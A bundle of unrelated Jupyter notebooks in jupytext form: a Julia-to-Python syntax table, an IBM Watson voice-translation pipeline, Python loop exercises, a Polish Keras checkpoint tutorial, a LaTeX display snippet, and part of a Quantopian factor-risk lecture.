# | `function foo(a, b=1, c...; d=1, e, f...)`<br /> `...`<br />`end`<br /><br />`foo(1, 2, 3, 4, e=5, x=10, y=20)`<br /> | `def foo(a, b=1, /, *c, d=1, e, **f):`<br /> `...`<br /><br />`foo(1, 2, 3, 4, e=5, x=10, y=20)`
#
# + [markdown] id="7RcghJ-EEUjz"
#
# |Julia|Python
# |-----|------
# |`x -> x^2` | `lambda x: x**2`
# |`(x,y) -> x + y` | `lambda x,y: x + y `
# |`() -> println("yes")` | `lambda: print("yes")`
#
# + [markdown] id="tHMPBcYYNJ-n"
# A few things to note here:
#
# * Julia only allows a single `catch` block which handles all possible exceptions.
# * `obj isa SomeClass` is a shorthand for `isa(obj, SomeClass)` which is equivalent to Python's `isinstance(obj, SomeClass)`.
#
# |Julia|Python
# |-----|------
# |`try`<br /> `...`<br />`catch ex`<br /> `if ex isa SomeError`<br /> `...`<br /> `else`<br /> `...`<br /> `end`<br />`finally`<br /> `...`<br />`end` | `try:`<br /> `...`<br />`except SomeException as ex:`<br /> `...`<br />`except Exception as ex:`<br /> `...`<br />`finally:`<br /> `...`
# |`throw any_value` | `raise SomeException(...)`
# | `obj isa SomeType`<br />or<br /> `isa(obj, SomeType`) | `isinstance(obj, SomeType)`
# + [markdown] id="Jz7_FaJcaZn-"
# In short:
#
# |Julia | Python
# |------|-------
# |`import Foo` | `import foo`
# |`import Foo.Bar` | `from foo import bar`
# |`import Foo.Bar: a, b` | `from foo.bar import a, b`
# |`import Foo.Bar.a, Foo.Bar.b` | `from foo.bar import a, b`
# |`import .Foo` | `import .foo`
# |`import ..Foo.Bar` | `from ..foo import bar`
# |`import ...Foo.Bar` | `from ...foo import bar`
# |`import .Foo: a, b` | `from .foo import a, b`
# ||
# |`using Foo` | `from foo import *; import foo`
# |`using Foo.Bar` | `from foo.bar import *; from foo import bar `
# |`using Foo.Bar: a, b` | `from foo.bar import a, b`
#
# |Extending function `Foo.f()` | Result
# |-----------------------------|--------
# |`import Foo.f # or Foo: f` <br />`f(x::Int64) = ...` | OK
# |`import Foo`<br />`Foo.f(x::Int64) = ...` | OK
# |`using Foo`<br />`Foo.f(x::Int64) = ...` | OK
# |`import Foo.f # or Foo: f`<br />`Foo.f(x::Int64) = ...` | `ERROR: Foo not defined`
# |`using Foo`<br />`f(x::Int64) = ...` | `ERROR: Foo.f must be explicitly imported`
# |`using Foo: f`<br />`f(x::Int64) = ...` | `ERROR: Foo.f must be explicitly imported`
# + [markdown] id="rQY6BRiBvdbU"
# |Julia (in interactive mode) | Python (in a terminal)
# |-----|------
# |`]status` | `pip freeze`<br />or<br />`conda list`
# |`]add Foo` | `pip install foo`<br />or<br />`conda install foo`
# |`]add Foo@1.2` | `pip install foo==1.2`<br />or<br />`conda install foo=1.2`
# |`]update Foo` | `pip install --upgrade foo`<br />or<br />`conda update foo`
# |`]pin Foo` | `foo==<version>` in `requirements.txt`<br /> or<br />`foo=<version>` in `environment.yml`
# |`]free Foo` | `foo` in `requirements.txt`<br />or<br />`foo` in `environment.yml`
# |`]test Foo` | `python -m unittest foo`
# |`]rm Foo` | `pip uninstall foo`<br />or<br />`conda remove foo`
# |`]help` | `pip --help`
#
# + id="Z3IpBJjap9Sm"
|
QM_IntroJulia.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/Cherrise-exe/LanguageTranslation_Watson/blob/main/voiceTranslation_withWatson.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="vZ_1-X1Nl8YK"
# 1. Authenticate
# + colab={"base_uri": "https://localhost:8080/"} id="kqrXundFl_Ju" outputId="ea95a9e2-f4ce-408b-c7fb-2fc1a2cfa063"
# NOTE: a bare `pip install` only works inside a notebook cell (IPython magic);
# from a plain Python script use `!pip install ibm_watson` or run pip separately.
pip install ibm_watson
# + id="X_KTLbi8uVuV"
from ibm_watson import SpeechToTextV1, LanguageTranslatorV3, TextToSpeechV1
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
# + id="PvnHQcMRvHjq"
# IBM Cloud credentials -- replace each placeholder with the API key and
# service URL from the corresponding service page in the IBM Cloud dashboard.
ltapikey = 'insert language translation apikey here'
lturl = 'insert language translation url here'
sttapikey = 'insert speech to text apikey here'
stturl = 'insert speech to text url here'
ttsapikey = 'insert text to speech apikey here'
ttsurl = 'insert text to speech url here'
# + id="H034XcxSFBuA"
# Setup Service
ttsauthenticator = IAMAuthenticator(ttsapikey)
# New Text to Speech service
tts = TextToSpeechV1(authenticator = ttsauthenticator)
# Set Service URL
tts.set_service_url(ttsurl)
# + id="DePHIoBj3eoH"
# Setup Service
ltauthenticator = IAMAuthenticator(ltapikey)
# New Language Translator service (comment previously said "TTS" -- copy/paste slip)
lt = LanguageTranslatorV3(version='2018-05-01', authenticator=ltauthenticator)
# Set Service URL
lt.set_service_url(lturl)
# + id="iR0xg4A68-YJ"
# Setup Service
sttauthenticator = IAMAuthenticator(sttapikey)
# New Speech to Text service (comment previously said "TTS" -- copy/paste slip)
stt = SpeechToTextV1(authenticator=sttauthenticator)
# Set Service URL
stt.set_service_url(stturl)
# + [markdown] id="UMpDQ--5l8e5"
# 2. Speech to Text
# + id="C-6CXwlal_VD"
# Transcribe a local audio file with Watson Speech to Text.
with open('sample.mp3', 'rb') as f:
    res = stt.recognize(audio=f, content_type='audio/mp3', model='en-US_NarrowbandModel').get_result()
# + colab={"base_uri": "https://localhost:8080/"} id="BxAQmh-k-WhE" outputId="f4d7431f-9c64-4dad-e750-c78243df9038"
res
# + id="ywoZ0wDp8k90"
# Take the top-ranked transcript of the first recognized utterance.
voicetext = res['results'][0]['alternatives'][0]['transcript']
# + [markdown] id="dk9MHWD7l8iR"
# 3. Text Translation
# + id="1WN2aCZHl_iV"
# Watson Language Translator model id: English -> Spanish.
englishtoSpanish = 'en-es'
# + id="BbiQtgPEA4Dj"
translation = lt.translate(text=voicetext, model_id=englishtoSpanish).get_result()
# + colab={"base_uri": "https://localhost:8080/"} id="ISGIMt-VBdi5" outputId="0cafd517-bd7e-4cdf-ce95-7354bf304a4e"
translation
# + id="RVEUV9RwDYd4"
translatedtext = translation['translations'][0]['translation']
# + colab={"base_uri": "https://localhost:8080/", "height": 36} id="zJWYYUm1DmFV" outputId="3416a002-793b-41f5-b1db-20ef49956ca3"
translatedtext
# + [markdown] id="EQ25pmiBuIy4"
# 4. Output Translation
# + id="OwVTHx67ExEd"
# Spanish (US) neural voice used for synthesis.
voice = 'es-US_SofiaV3Voice'
# + id="3eSeS7ACuISW"
# Synthesize the translated text and write the MP3 bytes to disk.
with open('translatedSample.mp3', 'wb') as audio_file:
    res = tts.synthesize(translatedtext, accept='audio/mp3', voice=voice).get_result()
    audio_file.write(res.content)
|
voiceTranslation_withWatson.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/janvincentvallente/CPEN-21A-CPE-1-2/blob/main/Loop_Statement.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="kkunsp41KHz3"
# ##For Loop
# + colab={"base_uri": "https://localhost:8080/"} id="x_zuSmqYKLwn" outputId="0bc11f7e-af78-423a-b074-7ab2a7f189c4"
# Days of the week; `week` is reused by the break-statement examples below.
week = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
# Print each day on its own line.
for day in week:
    print(day)
# + [markdown] id="LTKOq_N-LNSj"
# The Break Statement
# + colab={"base_uri": "https://localhost:8080/"} id="RDs06vrDLQ_J" outputId="631828ff-5a9f-47cb-dcc7-c5509613e4d8"
# First break demo: prints the day, THEN stops once Thursday has been
# reached -- so Thursday itself still appears in the output.
for x in week:
    print(x)
    if x=="Thursday":
        break
# + colab={"base_uri": "https://localhost:8080/"} id="Y4vFdkb6Lj1-" outputId="31af1cf2-b412-45c1-ca32-ba34114fcdce"
#The break statement
# Second break demo: tests BEFORE printing, so the loop stops without
# printing Thursday.
for x in week:
    if x=="Thursday":
        break
    print(x)
# + [markdown] id="dFYEyFGrMM2y"
# Looping Through String
# + colab={"base_uri": "https://localhost:8080/"} id="jTboojbXMSYy" outputId="e87282ad-833b-4fe6-9aaa-df6324bde378"
# A string is iterable: each pass yields one character.
for ch in "Programming in Python":
    print(ch)
# + [markdown] id="vYar6YWfMrQj"
# The Range() Function
# + colab={"base_uri": "https://localhost:8080/"} id="NJ_GMhOYMv5L" outputId="413ee63b-5edf-4082-e49c-e85c04005477"
# range(10) yields the integers 0 through 9.
for n in range(10):
    print(n)
# + [markdown] id="wFPjAfKrN10D"
# Nested Loops
# + colab={"base_uri": "https://localhost:8080/"} id="HvkN6kvEN34x" outputId="617c6c31-b18d-44b2-cbc6-3c71a015d53f"
# Nested loops: every adjective is paired with every fruit (3 x 3 = 9 lines).
adjective = ["red", "big", "tasty"]
fruits = ["apple", "banana", "cherry"]
for adj in adjective:
    for fruit in fruits:
        print(adj, fruit)
# + [markdown] id="LRL34ZmaOT5C"
# ##While Loop
# + colab={"base_uri": "https://localhost:8080/"} id="xFTU0sNbOWWR" outputId="5fca592d-af4d-47a3-a124-92e9297308c8"
# Count down while i > 6: prints 10, 9, 8, 7.
i = 10
while i>6:
    print(i)
    i-=1 #Assignment operator for subtraction, i=i-1
# + [markdown] id="JJqTz63cPdMb"
# The Break Statement
# + colab={"base_uri": "https://localhost:8080/"} id="baAEWYMuPf2w" outputId="3590634f-9c43-496c-cbdd-1df26f910bde"
# break exits immediately: prints 10, 9, 8 then stops
# (i is printed before the break test fires).
i = 10
while i>6:
    print(i)
    if i==8:
        break
    i-=1
# + [markdown] id="dW3s_MWyQUfh"
# The Continue Statement
# + colab={"base_uri": "https://localhost:8080/"} id="MOUD8bN-Q-py" outputId="20def923-2f6e-4cd6-c54c-e89c7f94178a"
# continue skips the print when i == 8: prints 9, 7, 6.
i = 10
while i>6:
    i-=1
    if i==8:
        continue
    print(i)
# + [markdown] id="rViSN0hTRUsZ"
# The Else Statement
# + colab={"base_uri": "https://localhost:8080/"} id="_L4hnVpaRXSp" outputId="1d9d0621-7da7-406a-fe0f-46ff3ead05f0"
# The while-else clause runs once the condition becomes false
# (it would be skipped if the loop exited via break).
i = 10
while i>6:
    i-=1
    print(i)
else:
    print("i is no longer greater than 6")
# + [markdown] id="eZ7EjS4KSD6B"
# Application 1
# + colab={"base_uri": "https://localhost:8080/"} id="DJys_PnFSGZa" outputId="60b29378-f9c9-4324-9d87-5196194931a9"
#For loop
# Prints "Value 0" .. "Value 10" by pairing the single label with each number.
a = ["Value"]
number = [0,1,2,3,4,5,6,7,8,9,10]
for x in a:
    for y in number:
        print(x,y)
# + colab={"base_uri": "https://localhost:8080/"} id="rMQhv6X4XjWp" outputId="2c98f159-cc99-408a-ef58-1550cea972c6"
#While loop
# Same output produced with a while loop. The explicit break at i == 10 is
# redundant (the i < 10 condition would end the loop anyway) -- kept here
# to illustrate break.
i = -1
while i<10:
    i+=1
    print("Value", i)
    if i==10:
        break
# + [markdown] id="Mdk2rDltSG0I"
# Application 2
# + colab={"base_uri": "https://localhost:8080/"} id="XiRkJdtFSWeQ" outputId="1577cb21-7b01-4b59-84b2-3ede04a80db0"
#While loop
# Counts down from 19 to 4; break fires at i == 4 (the loop condition alone
# would also have stopped after 4, so the printed values are unchanged).
i = 20
while i>3:
    i-=1
    print(i)
    if i==4:
        break
#else:
    #print("i is no longer greater than 3")
|
Loop_Statement.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/krakowiakpawel9/neural-network-course/blob/master/03_keras/06_save_load_model.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="yDsCNSGvU6UW"
# * @author: <EMAIL>
# * @site: e-smartdata.org
# + [markdown] id="5gjFu2l9IMsj"
# ### Zapisywanie i ładowanie wag z modelu
#
# Celem tego notebook'a jest nauczenie się pracy z obsługą modeli, m.in.:
# - zapisanie wag po każdej epoce
# - zapisanie wag po określonej liczbie epok
# - załadowanie wag
# - zapisanie całego modelu
# - załadowanie całego modelu
#
# ### Spis treści:
# 1. [Import bibliotek](#a0)
# 2. [Załadowanie danych i wstępna eksploracja](#a1)
# 3. [Budowa modelu](#a2)
# 4. [Zapisywanie punktów kontrolnych podczas trenowania](#a3)
# 5. [Załadowanie wag do modelu](#a4)
# 6. [Dodatkowe opcje](#a5)
# 7. [Ręczne zapisywanie wag](#a6)
# 8. [Zapisanie całego modelu](#a7)
#
#
#
# + [markdown] id="54PMwXoAJOhq"
# ### <a name='a0'> </a> 1. Import bibliotek
# + id="lyxtFjeeGECa"
# Przygotowanie środowiska do pracy z Tensorflow 2.0.
# Jeśli otrzymasz błąd podczas instalacji Tensorflow uruchom tę komórkę raz jeszcze.
# !pip uninstall -y tensorflow
# !pip install -q tensorflow==2.0.0
# + id="IqX0mhs4EXOo" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="93be2e89-a85f-4aa4-a55a-8e4804254712"
import os
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
from tensorflow.keras.datasets import mnist
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout
sns.set()
tf.__version__
# + [markdown] id="sYB9C6JnJYWG"
# ### <a name='a1'> </a> 2. Załadowanie danych i wstępna eksploracja
# + id="UBD08VRs909Y" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="ab938e93-8b20-48c9-e0d3-2be5f123ec2e"
# Download MNIST (28x28 grayscale digit images with integer labels).
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
# + id="3WxmAgGl-eS1" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="8125d138-01ad-4697-a91a-9e0c9d1885d5"
train_images.shape
# + id="kddg_vs0-is5" colab={"base_uri": "https://localhost:8080/", "height": 265} outputId="59836cb6-9589-407b-9167-a453bc325f68"
# Preview the first training digit.
plt.imshow(train_images[0], cmap='gray_r')
plt.grid(False)
plt.axis(False)
# + id="JTmBsyF8-nFt" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="d86bf235-a8eb-43c4-8fb4-a35b7d19da39"
train_labels[:10]
# + id="OgpEXGgd_MTn"
# Keep only the first 1000 examples (fast demo), flatten 28x28 -> 784,
# and scale pixel values to [0, 1].
train_images = train_images[:1000].reshape(-1, 28 * 28) / 255.
test_images = test_images[:1000].reshape(-1, 28 * 28) / 255.
train_labels = train_labels[:1000]
test_labels = test_labels[:1000]
# + [markdown] id="1mOy5Lf3JeRK"
# ### <a name='a2'> </a> 3. Budowa modelu
# + id="RCKJWnY0_kIb" colab={"base_uri": "https://localhost:8080/", "height": 255} outputId="ea1ccf21-0094-4c13-bf74-062ce59dce15"
def create_model():
    """Build and compile a small dense MNIST classifier (784 -> 512 -> 10).

    Returns a compiled Sequential model using Adam and sparse categorical
    cross-entropy, reporting accuracy.
    """
    net = Sequential([
        Dense(512, activation='relu', input_shape=(784,)),
        Dropout(0.2),
        Dense(10, activation='softmax'),
    ])
    net.compile(optimizer='adam',
                loss='sparse_categorical_crossentropy',
                metrics=['accuracy'])
    return net
model = create_model()
model.summary()
# + [markdown] id="d3n8nqGqAU1q"
# ### <a name='a3'> </a> 4. Saving checkpoints during training
# + id="o-dNZfs-AP4G"
checkpoint_path = 'training/cp.ckpt'
checkpoint_dir = os.path.dirname(checkpoint_path)
# + id="djxpL94pAryk" colab={"base_uri": "https://localhost:8080/", "height": 731} outputId="6cf2cd65-3080-4294-d37b-3744390360af"
from tensorflow.keras.callbacks import ModelCheckpoint
# Save weights (only) to the same checkpoint path after every epoch.
cp_callback = ModelCheckpoint(filepath=checkpoint_path,
                              save_weights_only=True,
                              verbose=1)
model.fit(train_images, train_labels, epochs=10, validation_data=(test_images, test_labels), callbacks=[cp_callback])
# + id="6BUsATRjBKnY" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="d3449710-f58e-4f56-cec2-783b750428d4"
# ls -l {checkpoint_dir}
# + [markdown] id="_NnhVksfB-7r"
# ### <a name='a4'> </a> 5. Załadowanie wag do modelu
# + id="VGogndNiBnpf" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="19191a5c-9e42-4810-a364-72c8082c3d82"
# A fresh (untrained) model evaluates at roughly chance level.
model = create_model()
loss, acc = model.evaluate(test_images, test_labels, verbose=2)
print(acc)
# + id="3zGt9VvDCMfF" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="58233c0a-ba6b-43a9-8aa6-3459cc8b2cff"
# Restoring the checkpointed weights recovers the trained accuracy.
model.load_weights(checkpoint_path)
loss, acc = model.evaluate(test_images, test_labels, verbose=2)
print(acc)
# + [markdown] id="mYNgLmH1D05K"
# ### <a name='a5'> </a> 6. Additional options
# + id="YNxS9XAPHmfj"
# !rm -rf ./training
# + id="a6UE41gQCu6f" colab={"base_uri": "https://localhost:8080/", "height": 391} outputId="8df0ebe5-3cdd-4679-eac2-989ccc7c85f7"
# Save a separate, epoch-numbered checkpoint every 5 epochs
# (the {epoch:04d} placeholder in the path).
checkpoint_path = 'training/cp-{epoch:04d}.ckpt'
checkpoint_dir = os.path.dirname(checkpoint_path)
cp_callback = ModelCheckpoint(filepath=checkpoint_path,
                              save_weights_only=True,
                              period=5,
                              verbose=1)
model = create_model()
model.save_weights(checkpoint_path.format(epoch=0))
model.fit(train_images, train_labels, epochs=50, validation_data=(test_images, test_labels), callbacks=[cp_callback], verbose=0)
# + id="3-AHX5juEcY9" colab={"base_uri": "https://localhost:8080/", "height": 425} outputId="024cb563-3049-4bec-b990-e1b0300256e7"
# !ls -l ./training
# + id="509374ChEqfh" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="1cbb6047-48e3-41f9-e19b-de197325199b"
import tensorflow as tf
# Find the most recent checkpoint file in the directory.
latest = tf.train.latest_checkpoint(checkpoint_dir)
latest
# + id="97MrbQqJFp2s" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="31d6a5f6-d8ab-4e9a-d13a-bd2ece827618"
model = create_model()
model.load_weights(latest)
loss, acc = model.evaluate(test_images, test_labels, verbose=2)
print(acc)
# + [markdown] id="mz-fWfcgGKGo"
# ### <a name='a6'> </a> 7. Ręczne zapisywanie wag
# + id="MKC-tEIHF40H" colab={"base_uri": "https://localhost:8080/", "height": 173} outputId="560bfbf7-de7f-4a85-bf3d-47c7a596689a"
# Manual weight saving: save, rebuild a fresh model, reload, re-evaluate.
model.save_weights('./checkpoints/my_checkpoint')
model = create_model()
model.load_weights('./checkpoints/my_checkpoint')
loss, acc = model.evaluate(test_images, test_labels, verbose=2)
print(acc)
# + id="IAD7o2W3GjHm" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="e8ed6aea-3ebc-4e22-fac1-f6c92ac5aa69"
# !ls -l checkpoints/
# + [markdown] id="ZXqSRptdG2ba"
# ### <a name='a7'> </a> 8. Saving the whole model
# + id="uUAb5awSGrlF" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="1677971f-f74b-489f-ef41-58b40a657b99"
# Save architecture + weights + optimizer state in a single HDF5 file.
model = create_model()
model.fit(train_images, train_labels, epochs=5)
model.save('my_model.h5')
# + id="WCUeP6g0HAL4" colab={"base_uri": "https://localhost:8080/", "height": 255} outputId="6553862b-bbec-49fa-ab1f-d3f41652bbfd"
from tensorflow.keras.models import load_model
# load_model restores the full model -- no create_model() call needed.
new_model = load_model('my_model.h5')
new_model.summary()
# + id="jYpSl2VBHhvw" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="91646fbc-4308-4139-8fe9-be6cb69412b7"
loss, acc = new_model.evaluate(test_images, test_labels, verbose=2)
print(acc)
|
03_keras/06_save_load_model.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from IPython.display import display, Markdown
# Sample quantities (units: metres / square metres / cubic metres).
a = 13.49
b = 2.2544223
P = 302.99
V = 90.02
# Render the values as LaTeX-formatted Markdown. Double braces {{ }} emit
# literal braces for \mathrm; single braces interpolate the Python values.
# NOTE(review): the "Dims" line interpolates a*b (the product) as the first
# figure -- presumably {a:.4} was intended so it reads "a m x b m"; confirm.
display(Markdown(
rf"""
Dims: $\mathrm{{ {a*b:.4} \, m \times {b:.3} \, m }}$
Area: $\mathrm{{ {P} \, m^2 }}$
Volume: $\mathrm{{ {V} \, m^3}}$
"""))
|
Ejercitacion/practica2/Untitled.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Risk-Constrained Portfolio Optimization
#
# by <NAME> and <NAME>
#
# Part of the Quantopian Lecture Series:
# * [www.quantopian.com/lectures](https://www.quantopian.com/lectures)
# * [https://github.com/quantopian/research_public](https://github.com/quantopian/research_public)
#
# ---
# Risk management is critical for constructing portfolios and building algorithms. Its main function is to improve the quality and consistency of returns by adequately accounting for risk. Any returns obtained by *unexpected* risks, which are always lurking within our portfolio, can usually not be relied upon to produce profits over a long time. By limiting the impact of or eliminating these unexpected risks, the portfolio should ideally only have exposure to the alpha we are pursuing. In this lecture, we will focus on how to use factor model in risk management.
#
# ## Factor Models
# We have written many lectures on [Factor Models](https://www.quantopian.com/lectures/the-capital-asset-pricing-model-and-arbitrage-pricing-theory) and the calculation of [Factor Risk Exposure](https://www.quantopian.com/lectures/factor-risk-exposure), as well as [how to analyze alpha factors](https://www.quantopian.com/lectures/factor-analysis). The notation we generally use when introducing a factor model is as follows:
#
# $$R_i = a_i + b_{i1} F_1 + b_{i2} F_2 + \ldots + b_{iK} F_k + \epsilon_i$$
#
# where:
# $$\begin{eqnarray}
# k &=& \text{the number of factors}\\
# R_i &=& \text{the return for company $i$}, \\
# a_i &=& \text{the intercept},\\
# F_j &=& \text{the return for factor $j$, $j \in [1,k]$}, \\
# b_{ij} &=& \text{the corresponding exposure to factor $j$, $j \in [1,k]$,} \\
# \epsilon_i &=& \text{specific fluctuation of company $i$.}\\
# \end{eqnarray}$$
#
#
# To quantify unexpected risks and have acceptable risk levels in a given portfolio, we need to answer 3 questions:
#
# 1. What proportion of the variance of my portfolio comes from common risk factors?
#
# 2. How do I limit this risk?
#
# 3. Where does the return/PNL of my portfolio come from, i.e., to what do I attribute the performance?
# These risk factors can be:
# - Classical fundamental factors, such as those in the [CAPM](https://www.quantopian.com/lectures/the-capital-asset-pricing-model-and-arbitrage-pricing-theory) (market risk) or the [Fama-French 3-Factor Model](https://www.quantopian.com/lectures/fundamental-factor-models) (price-to-book (P/B) ratio, volatility)
# - Sector or industry exposure
# - Macroeconomic factors, such as inflation or interest rates
# - Statistical factors that are based on historical returns and derived from principal component
# analysis
# ### Universe
#
# The base universe of assets we use here is the QTradableStocksUS.
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import statsmodels.api as sm
from quantopian.pipeline import Pipeline
from quantopian.pipeline.data import Fundamentals
from quantopian.pipeline.data.builtin import USEquityPricing
from quantopian.pipeline.factors import CustomFactor, Returns
from quantopian.pipeline.experimental import QTradableStocksUS
from quantopian.research import run_pipeline
# date range for building risk model
start = "2009-01-01"
end = "2011-01-01"
# First we pull the returns of every asset in this universe across our desired time period.
# +
def qtus_returns(start_date, end_date):
    """Daily returns for every asset in the QTradableStocksUS universe.

    Runs a pipeline pulling the latest close for each asset, forward- then
    back-fills missing prices, drops assets with any remaining NaNs, and
    returns a DataFrame of daily percent-change returns (dates x assets).
    """
    pipe = Pipeline(
        columns={'Close': USEquityPricing.close.latest},
        screen = QTradableStocksUS()
    )
    stocks = run_pipeline(pipe, start_date, end_date)
    unstacked_results = stocks.unstack()
    # NOTE(review): shift(periods=-1) moves each price back one timestamp --
    # presumably to align pipeline output dates with trade dates; the
    # trailing NaN row introduced by the shift is dropped. Confirm intent.
    prices = (unstacked_results['Close'].fillna(method='ffill').fillna(method='bfill')
              .dropna(axis=1,how='any').shift(periods=-1).dropna())
    # First pct_change row is NaN, so it is skipped.
    qus_returns = prices.pct_change()[1:]
    return qus_returns
R = qtus_returns(start, end)
# Python 2 print statements (the notebook kernel is Python 2).
print "The universe we define includes {} assets.".format(R.shape[1])
print 'The number of timestamps is {} from {} to {}.'.format(R.shape[0], start, end)
# -
# Asset identifiers for the universe; reused when building exposures below.
assets = R.columns
# ### Factor Returns and Exposures
#
# We will start with the classic Fama-French factors. The Fama-French factors are the market, company size, and company price-to-book (PB) ratio. We compute each asset's exposures to these factors, computing the factors themselves using pipeline code borrowed from the [Fundamental Factor Models lecture](https://www.quantopian.com/lectures/fundamental-factor-models).
def make_pipeline():
    """
    Create and return our pipeline.

    We break this piece of logic out into its own function to make it easier to
    test and modify in isolation.

    In particular, this function can be copy/pasted into the backtester and run by itself.
    """
    # Market Cap
    # NOTE(review): shares_outstanding / close is shares-per-dollar, not
    # market cap (which would be shares * close); confirm this ranking basis.
    market_cap = Fundamentals.shares_outstanding.latest/USEquityPricing.close.latest
    # Book to Price ratio (inverse of the price-to-book ratio)
    book_to_price = 1/Fundamentals.pb_ratio.latest
    # Build Filters representing the top and bottom 500 stocks by our combined ranking system.
    biggest = market_cap.top(500, mask=QTradableStocksUS())
    smallest = market_cap.bottom(500, mask=QTradableStocksUS())
    highpb = book_to_price.top(500, mask=QTradableStocksUS())
    lowpb = book_to_price.bottom(500, mask=QTradableStocksUS())
    # Union of all four buckets -- only these assets pass the screen.
    universe = biggest | smallest | highpb | lowpb
    pipe = Pipeline(
        columns = {
            'returns' : Returns(window_length=2),
            'market_cap' : market_cap,
            'book_to_price' : book_to_price,
            'biggest' : biggest,
            'smallest' : smallest,
            'highpb' : highpb,
            'lowpb' : lowpb
        },
        screen=universe
    )
    return pipe
# Here we run our pipeline and create the return streams for high-minus-low and small-minus-big.
# +
pipe = make_pipeline()
# This takes a few minutes.
results = run_pipeline(pipe, start, end)
# Equal-weighted mean daily return of each bucket, grouped by date.
R_biggest = results[results.biggest]['returns'].groupby(level=0).mean()
R_smallest = results[results.smallest]['returns'].groupby(level=0).mean()
R_highpb = results[results.highpb]['returns'].groupby(level=0).mean()
R_lowpb = results[results.lowpb]['returns'].groupby(level=0).mean()
# Long/short factor return streams: Small-Minus-Big and High-Minus-Low.
SMB = R_smallest - R_biggest
HML = R_highpb - R_lowpb
df = pd.DataFrame({
    'SMB': SMB, # company size
    'HML': HML # company PB ratio
},columns =["SMB","HML"]).shift(periods =-1).dropna()
# Market factor proxied by SPY daily returns (first NaN row skipped).
MKT = get_pricing('SPY', start_date=start, end_date=end, fields='price').pct_change()[1:]
MKT = pd.DataFrame({'MKT':MKT})
# Combined factor-return DataFrame: columns MKT, SMB, HML.
F = pd.concat([MKT,df],axis = 1).dropna()
# -
ax = ((F + 1).cumprod() - 1).plot(subplots=True, title='Cumulative Fundamental Factors')
ax[0].set(ylabel = "daily returns")
ax[1].set(ylabel = "daily returns")
ax[2].set(ylabel = "daily returns")
plt.show()
# ### Calculating the Exposures
#
# Running a multiple linear regression on the fundamental factors for each asset in our universe, we can obtain the corresponding factor exposure for each asset. Here we express:
#
# $$ R_i = \alpha_i + \beta_{i, MKT} R_{i, MKT} + \beta_{i, HML} R_{i, HML} + \beta_{i, SMB} R_{i, SMB} + \epsilon_i$$
#
# for each asset $S_i$. This shows us how much of each individual security's return is made up of these risk factors.
#
# We calculate the risk exposures on an asset-by-asset basis in order to get a more granular view of the risk of our portfolio. This approach requires that we know the holdings of the portfolio itself, on any given day, and is computationally expensive.
# factor exposure
# B collects per-asset betas to [MKT, SMB, HML]; epsilon collects each
# asset's residual (idiosyncratic) return series.
B = pd.DataFrame(index=assets, dtype=np.float32)
epsilon = pd.DataFrame(index=R.index, dtype=np.float32)
# +
x = sm.add_constant(F)
for i in assets:
    y = R.loc[:,i]
    # Trim observations more than 3 standard deviations from the mean
    # before fitting, so outliers don't dominate the OLS betas.
    y_inlier = y[np.abs(y - y.mean())<=(3*y.std())]
    x_inlier = x[np.abs(y - y.mean())<=(3*y.std())]
    result = sm.OLS(y_inlier, x_inlier).fit()
    # params order follows sm.add_constant(F): [const, MKT, SMB, HML].
    B.loc[i,"MKT_beta"] = result.params[1]
    B.loc[i,"SMB_beta"] = result.params[2]
    B.loc[i,"HML_beta"] = result.params[3]
    # Residual is computed over the FULL sample (including the trimmed
    # outliers), using the betas fit on the inliers.
    epsilon.loc[:,i] = y - (x.iloc[:,0] * result.params[0] +
                            x.iloc[:,1] * result.params[1] +
                            x.iloc[:,2] * result.params[2] +
                            x.iloc[:,3] * result.params[3])
# -
# The factor exposures are shown as follows. Each individual asset in our universe will have a different exposure to the three included risk factors.
# +
fig,axes = plt.subplots(3, 1)
ax1,ax2,ax3 =axes
B.iloc[0:10,0].plot.barh(ax=ax1, figsize=[15,15], title=B.columns[0])
B.iloc[0:10,1].plot.barh(ax=ax2, figsize=[15,15], title=B.columns[1])
B.iloc[0:10,2].plot.barh(ax=ax3, figsize=[15,15], title=B.columns[2])
